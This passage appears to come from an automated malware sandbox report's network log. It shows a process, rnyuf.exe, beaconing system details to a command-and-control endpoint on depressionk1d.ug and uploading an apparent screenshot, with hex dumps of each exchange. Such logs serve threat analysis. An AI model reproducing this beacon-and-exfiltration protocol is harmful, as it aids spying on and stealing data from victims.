                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:11.712528944 CET10738INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          263192.168.2.450084178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:11.840039968 CET10739OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:11.862828970 CET10740INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:11 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:11.862843037 CET10740INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          264192.168.2.450085178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:11.998836040 CET10741OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:12.024379969 CET10741INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:12 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          265192.168.2.450086178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:12.153428078 CET10742OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:12.267406940 CET10832INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:12 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          266192.168.2.450087178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:12.208982944 CET10742OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:12.209177017 CET10742OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:12.209367990 CET10753OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:12.209464073 CET10755OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:12.231785059 CET10764OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:12.231863022 CET10781OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:24:12.254282951 CET10789OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:24:12.254369974 CET10808OUTData Raw: 61 82 fe 55 f8 9d 67 c5 9b 54 b0 f8 61 15 9c 45 8c 70 4b 04 4a 58 f2 42 82 06 7d f8 af 9e ab bd f1 67 c5 1b ef 16 e8 6d a5 dc e9 d6 f0 21 91 64 0f 13 b6 41 1f 5f ad 70 55 78 78 4e 31 7c db dc 55 e5 19 49 72 ed 60 a5 a4 a2 b7 30 0a 29 45 06 80 0a
                          Data Ascii: aUgTaEpKJXB}gm!dA_pUxxN1|UIr`0)E(4;Pzm8P@:AKLBh0E%-Mj-Q@Rm(!L8UNDQL)TKN"GR3N+Si0m(H\QLC?0SZ%)hD@RFSMT'GjL
                          Nov 12, 2021 22:24:12.254401922 CET10821OUTData Raw: 40 f9 fd d4 9e 8a 2b e6 80 6b d2 c0 fc 2c 75 3e 08 fc c5 3c 52 67 9a 42 79 a5 ae e3 01 c2 96 90 52 d3 10 51 9a 42 68 a2 e0 28 a5 ed 40 a2 98 80 f5 a7 af 4a 6d 2e 4d 34 26 3f 3c d1 4d 06 94 1c 9a 62 1d 47 4a 41 4b 4c 42 d0 29 05 2d 02 1c 29 45 36
                          Data Ascii: @+k,u><RgByRQBh(@Jm.M4&?<MbGJAKLB)-)E6%4P!iiE0Gd.ifXRx5H~iKM=(hCN(p4NUE-4t!4)D9S(D4hP4)<U"1NRLQK@
                          Nov 12, 2021 22:24:12.254420996 CET10826OUTData Raw: ea da 1b 26 9a de c2 45 56 43 3a bb b1 39 89 f0 15 42 75 c7 24 e4 d5 29 3c 31 61 71 79 69 0e 97 7e 6e 60 7d 5a 6b 09 ae 43 29 50 8b b5 96 41 81 d0 a1 62 4e 48 f9 0e 2a bd ac 39 ad fd 74 ff 00 31 7b 39 5a ff 00 d6 d7 39 4c 52 e2 bb 18 34 0d 0a f3
                          Data Ascii: &EVC:9Bu$)<1aqyi~n`}ZkC)PAbNH*9t1{9Z9LR4N:kq{cy}((<yX-|qK&TZq;/)Sw$(jEt:6jsZo[ilIs6c~uV'sj][j70e39n)g*3HO05D
                          Nov 12, 2021 22:24:12.254482031 CET10829OUTData Raw: 9c 7c 84 a5 e9 85 aa 32 fe f4 d2 d5 2e 45 28 0f 2d 4d 2d 51 96 a6 16 ac dc 8b 51 25 2d 4d 2f 51 16 a4 2d 53 cc 5a 89 21 6a 4d f5 11 6a 40 d5 1c c5 72 92 96 a6 96 a8 cb d3 4b 54 b9 14 a2 38 b5 34 b6 69 a4 d3 49 a9 72 2d 21 49 a2 99 9a 01 a9 b9 56
                          Data Ascii: |2.E(-M-QQ%-M/Q-SZ!jMj@rKT84iIr-!IVhHE;BhSsNA@@M74P)k=>{`W^"?x/2*'|kgzxO+PJ5|Tg!3%
                          Nov 12, 2021 22:24:12.302145004 CET10852INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:12 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          267192.168.2.450088178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:12.402668953 CET10853OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:13.172868967 CET10853INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:13 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          268192.168.2.450089178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:13.308990002 CET10855OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:13.334873915 CET10855INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:13 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          269192.168.2.450091178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:13.435091972 CET10859OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:13.435244083 CET10860OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:13.435445070 CET10870OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:13.435530901 CET10872OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
